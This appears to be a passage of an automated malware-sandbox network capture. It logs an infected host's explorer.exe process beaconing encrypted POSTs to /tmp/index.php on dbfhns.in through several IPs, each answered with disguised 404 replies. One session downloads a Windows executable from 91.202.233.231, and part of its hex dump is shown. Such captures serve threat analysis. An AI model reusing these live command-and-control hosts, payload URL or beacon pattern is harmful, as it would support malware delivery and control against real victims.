May 26, 2024 10:30:54.355801105 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://utrnyeeydifgj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: dbfhns.in
May 26, 2024 10:30:54.355818987 CEST	185	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2e 42 ba f8 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu.B\|1{g2vFYj8bnoSLVP//%SLpU[5f[[Gb;A
May 26, 2024 10:30:55.749445915 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49732	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:55.854760885 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kyidhbcjdpvriid.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: dbfhns.in
May 26, 2024 10:30:55.854789972 CEST	342	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 49 1c df b6 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vuI.jJl@j_1;5L`nSf^7nVJ()JnBEnB$CE5f,F 809-$Um`_[dBc<4g
May 26, 2024 10:30:57.017582893 CEST	210	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49733	91.202.233.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:57.087943077 CEST	184	OUT	GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 91.202.233.231
May 26, 2024 10:30:57.790154934 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:57 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 26 May 2024 08:26:18 GMT ETag: "205e00-6195727a15e80" Accept-Ranges: bytes Content-Length: 2121216 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*P @ @`J"pD<CODE `DATA& (@BSS-P6.idataJ"`$6@.tlsZ.rdataZ@P.reloc<\@P.rsrcDpD@P ^ @P
May 26, 2024 10:30:57.792354107 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word
May 26, 2024 10:30:57.797133923 CEST	1236	IN	Data Raw: 8b 06 8b 10 89 16 5e 5b c3 90 89 00 89 40 04 c3 8b c0 53 56 8b f2 8b d8 e8 9d ff ff ff 85 c0 75 05 33 c0 5e 5b c3 8b 16 89 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 55 49 00 Data Ascii: ^[@SVu3^[PVPXB^[PQUIUISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uB
May 26, 2024 10:30:57.797169924 CEST	1236	IN	Data Raw: 4c 24 04 8b d7 2b 53 0c 8b 43 08 03 43 0c e8 db fc ff ff 83 7c 24 04 00 74 33 8d 4c 24 0c 8d 54 24 04 8b c5 e8 5d fb ff ff 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b Data Ascii: L$+SCC\|$t3L$T$]\|$uL$T$D$%$3L$\|$t4L$T$\|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$
May 26, 2024 10:30:57.806745052 CEST	1236	IN	Data Raw: f4 8b fa 8b f0 c6 04 24 00 8b c6 e8 96 fe ff ff 8b d8 85 db 0f 84 82 00 00 00 8b 6b 08 8b c5 03 43 0c 8b d0 8d 0c 37 2b d1 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24 Data Ascii: $kC7+++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$VIDu$VI\[:
May 26, 2024 10:30:57.806778908 CEST	1236	IN	Data Raw: e8 05 18 00 00 eb 32 8b c3 e8 b4 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 27 23 40 00 80 3d 4d 50 49 00 00 74 0a 68 cc 55 49 00 e8 fd f0 ff ff c3 e9 ef 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3 Data Ascii: 2E3ZYYdh'#@=MPIthUIE_^[YY]@UQSVW3UI=UIufuUIEa3Uh$@d1d!=MPIthUIuUIUI%)UItEP\|tUI
May 26, 2024 10:30:57.816397905 CEST	1236	IN	Data Raw: 50 89 c8 ff 15 44 20 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 20 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 20 49 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 5f 3b 00 00 83 b8 00 00 00 00 00 Data Ascii: PD IYt@ IutP< IYt@_;tQ;@3?;t1;@3SV;t;^;3F3^[@ ISV=PItPIu:
May 26, 2024 10:30:57.816431999 CEST	1236	IN	Data Raw: 75 f6 83 c4 18 5f 5e 5b c3 90 8b ca 33 d2 e8 97 ff ff ff c3 8b c0 53 56 57 89 c6 50 85 c0 74 6c 31 c0 31 db bf cc cc cc 0c 8a 1e 46 80 fb 20 74 f8 b5 00 80 fb 2d 74 62 80 fb 2b 74 5f 80 fb 24 74 5f 80 fb 78 74 5a 80 fb 58 74 55 80 fb 30 75 13 8a Data Ascii: u_^[3SVWPtl11F t-tb+t_$t_xtZXtU0uFxtHXtCt t-0w%9w!Fut}TF~KxI[)GFFtar 0vw9wFuuY12_^[@
May 26, 2024 10:30:57.827008963 CEST	1236	IN	Data Raw: 68 80 31 40 00 8b 45 fc 50 e8 f0 e1 ff ff c3 e9 96 08 00 00 eb ef 66 a1 20 20 49 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 20 49 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 Data Ascii: h1@EPf If%fUf?ff I]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- IVWp1A_^@S1t@1;JuJ<2<uIuC[@tS&9\[S;
May 26, 2024 10:30:57.827043056 CEST	1236	IN	Data Raw: d8 8b c3 8b 10 ff 52 e4 8b c3 5b c3 8b c0 84 d2 7f 01 c3 50 52 8b 10 ff 52 e8 5a 58 c3 90 80 3d 28 20 49 00 01 76 11 6a 00 6a 00 6a 00 68 df fa ed 0e ff 15 14 50 49 00 c3 90 80 3d 28 20 49 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 Data Ascii: R[PRRZX=( IvjjjhPI=( ItPPRTjjhPIX@TjjhPIX@=( IvPs=( IvPS@tA9t9uAA=( IvPRQQTjjhPIYYZX=( IvRTj
May 26, 2024 10:30:57.827074051 CEST	1236	IN	Data Raw: ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e eb 60 05 71 ff ff 3f 83 e8 02 72 36 74 30 eb 52 3d 96 00 00 c0 7f 11 74 3d 2d 93 00 00 c0 74 2e 48 74 13 48 74 24 eb 3a 2d Data Ascii: U=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%R]D$@=( IwD$PtqD$T$jPh;@RPI\$;SC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49734	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:59.974334002 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cqkwdxujhjkjfbp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: dbfhns.in
May 26, 2024 10:30:59.974356890 CEST	163	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 73 29 b9 fd Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA ,[k,vus)EgRk/lc<Y\wEzQ.NB$1@HM\X
May 26, 2024 10:31:01.133512020 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:31:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49772	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:12.622813940 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ahlpadnysdsadbk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: dbfhns.in
May 26, 2024 10:32:12.622813940 CEST	175	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 53 e0 9d Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu@S\k`3VT(Ig<v\|#E")K[f;,KbTF<v9Qq
May 26, 2024 10:32:13.782515049 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49773	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:18.038748980 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqdfdnedidrxaed.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: dbfhns.in
May 26, 2024 10:32:18.038749933 CEST	266	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 59 f1 86 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuuYw~` Bo:pBaF0]\QDF]>KXYZ!6D:W[OV3+Zu[N^i?%il(_m>h
May 26, 2024 10:32:19.417901039 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49774	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:23.617804050 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mdrbuklfbrraj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: dbfhns.in
May 26, 2024 10:32:23.617836952 CEST	201	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 21 dd ea Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu&!cQEuMaq~f+>P 0;%ZKo+/,!bU\|sG K
May 26, 2024 10:32:24.818075895 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49775	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:30.788438082 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xmvygvmqskvs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: dbfhns.in
May 26, 2024 10:32:30.788480997 CEST	319	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 48 ec f2 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuXHFaua0:wArE9vZYHD=yP3az1L#pwQn)t3$F6oX+`%cmVAnBG}3
May 26, 2024 10:32:31.949192047 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49776	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:35.641693115 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://efeegeullncj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: dbfhns.in
May 26, 2024 10:32:35.641782045 CEST	290	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 00 ce 93 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu'e)n+?2/wlYv7SG69Wy"[)V#/Y]0X7JlO("fv<VU}DX4/Q<
May 26, 2024 10:32:36.808008909 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49777	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:40.871504068 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bduckycvwfnemtxt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: dbfhns.in
May 26, 2024 10:32:40.871505022 CEST	159	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 43 b6 92 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vueCu\whH,(afJ`QR<9>d[RDAEH
May 26, 2024 10:32:42.021589994 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49778	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:49.228873968 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ejfrahknvjij.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: dbfhns.in
May 26, 2024 10:32:49.228907108 CEST	224	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 1f de be Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu7HYN[61)"i\J/yK*KN8l9Su1iJ(,9}OUd`^Rgy_{l
May 26, 2024 10:32:50.206007004 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49779	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:54.137737989 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmlyvkkabycy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: dbfhns.in
May 26, 2024 10:32:54.137788057 CEST	251	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 2a a3 9e Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuSavR: D\|(5"P\>RCI~NVxI7 CL,`X2kRr0NtMtpv;^Mmi)S'
May 26, 2024 10:32:55.081934929 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49780	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:32:59.095133066 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ddteakwbikxqkc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: dbfhns.in
May 26, 2024 10:32:59.095155954 CEST	116	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 5d b4 80 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu&][`zfk4gFC5`d
May 26, 2024 10:33:00.067755938 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49781	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
